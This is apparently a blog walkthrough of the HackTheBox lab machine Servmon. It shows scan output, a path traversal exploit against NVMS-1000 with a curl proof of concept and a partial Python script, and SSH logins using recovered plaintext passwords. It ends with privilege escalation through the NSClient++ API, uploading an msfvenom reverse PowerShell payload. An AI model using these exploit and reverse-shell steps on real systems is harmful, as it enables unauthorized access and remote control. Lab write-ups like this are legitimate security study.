Servmon is a new machine which receives very low ratings because a lot of people are complaining about the nsclient++ web portal being “unstable”, well this can be circumvented by using chromium browser, if you are using kali linux as root then run chromium --no-sandbox, you cannot login to this portal remotely because it is restricted only to localhost but this can be circumvented by using ssh tunnel.

nmap scan

nmap -sC -sV -oN servmon -vvv
In summary these are the ports:

21/tcp   open  ftp           syn-ack ttl 127 Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM                 Users
| ftp-syst:
|_  SYST: Windows_NT
22/tcp   open  ssh           syn-ack ttl 127 OpenSSH for_Windows_7.7 (protocol 2.0)

80/tcp   open  http          syn-ack ttl 127

135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds? syn-ack ttl 127
5666/tcp open  tcpwrapped    syn-ack ttl 127
6699/tcp open  napster?      syn-ack ttl 127
8443/tcp open  ssl/https-alt syn-ack ttl 127

Host script results:
|_clock-skew: 2m30s
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 40676/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 20065/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 54993/udp): CLEAN (Failed to receive data)
|   Check 4 (port 62863/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-04-15T04:42:56
|_  start_date: N/A

I have tested the 139 and 445 and did web fuzzing on, i cannot find entry point for smb vulnerability, web fuzzing also did not enumerate any useful directory:

DIRB v2.22
By The Dark Raver

OUTPUT_FILE: dirb_result
START_TIME: Thu Apr 16 11:10:01 2020
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt



---- Scanning URL: ----
+ (CODE:200|SIZE:1150)
+ (CODE:200|SIZE:340)

END_TIME: Thu Apr 16 11:38:15 2020

NVMS-1000 web portal

Searching the web with duckduckgo I have found that there is a path traversal vulnerability.

On searchsploit this exploit can be found:

Read the exploit doc you will see a poc:

curl http://[IP Address]/../../../mnt/mtd/config/config.dat 2>/dev/null | strings

I tested this with msfconsole and files can be downloaded.

nsclient++ configuration file can be downloaded from this path /program+files/nsclient%2B%2B/nsclient.ini you need to understand the filepath is an uri hence the “/” and space has to be encoded in url.


In the nsclient.ini a plaintext password of nsclient is found, this is used when rooting the machine, so first of all we need to find the user flag first.

User’s flag hint

FTP to, this ftp server allows anonymous login.
Then enumerate the directory once connection established.
Download the files in respective directories to find out what are they.

Looking at Confidential.txt, I found out where to look for passwords.

Read the Notes to do.txt, I understood that nsclient cannot be access remotely, this coincides with the nsclient.ini, which only allows

Looking at nsclient.ini

Download password.txt

I will be using the same path traversal exploit of nvms-1000 to help me download the password.txt file.
I could use the same exploit in msfconsole to do it, but i have decided to write my python script to help me download the file.

import requests

# You will need to encode the ../ to url in order for the web to understand it 😉
# I have fuzzed it until it spits out the nsclient.ini hahaha
trasversal = "..%2F"
web = "http"
port = 80
outfile = "passwords.txt"
# on msfconsole use the auxiliary/scanner/http/tvt_nvms_traversal
# set filepath to /Users/Nathan/Desktop/Passwords.txt
filepath = "Users%2FNathan%2FDesktop%2FPasswords.txt"
uri = f"{web}://{trasversal * 3}{filepath}"
response = requests.get(uri, verify=False)
if response.status_code == 200:
with open(f"/root/htb/servmon/{outfile}", "w") as file:

There are several passwords I tested each password for both nathan and nadine with ssh and finally I got connected to nadine with this password: L1k3B1gBut7s@W0rk

Get user’s flag

ssh nadine@ with the password found.

Privilege escalation

As only is allowed to access nsclient++ web portal, I need ssh tunnel to bypass this restriction. Also the webportal may not displayed properly in firefox, I recommend you use chromium which is much better.

ssh -L 8080: nadine@
This is the command line to set up ssh tunnel, what this means is that you are setting up a ssh proxy which is listened by your attacking machine which is, the traffic is sent over to which in turn sends back to the localhost of the remote machine at port 8443.

This is how I use chromium --no-sandbox to open the nsclient web ui and login with the password discovered from nsclient.ini.
this is the nsclient password discovered ew2x6SsGTxjRwXOT
There is a vulnerability with nsclient which you can use searchsploit nsclient

You can read the instruction, the pre-requisites are to enable CheckExternalScripts and Scheduler, you can check this in the web ui to ensure these two modules are enabled.

I have tried to add my own scripts in the web ui but i got problem configuring them so I turned to use nsclient api, use the add script api.
I tried to upload the nc.exe but it was deleted I suspect it was quarantined by the Windows Defender, and also I tried to upload a reverse shell powershell script it was also deleted. But there is a solution I use msfvenom and created a batch file that triggers a powershell script within the batch file.
msfvenom -p cmd/windows/reverse_powershell lhost= lport=4444 -o evilps.bat


Use this curl command to upload the batch from my attacking machine to servmon.
curl -s -k -u admin -X PUT https://localhost:8080/api/v1/scripts/ext/scripts/evilps.bat --data-binary @evilps.bat
notice the address is https://localhost:8080 which is through the ssh tunnel.

Set up the multi handler in msfconsole with the same payload i used for msfvenom.

Then run the command in nsclient web ui console.



Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s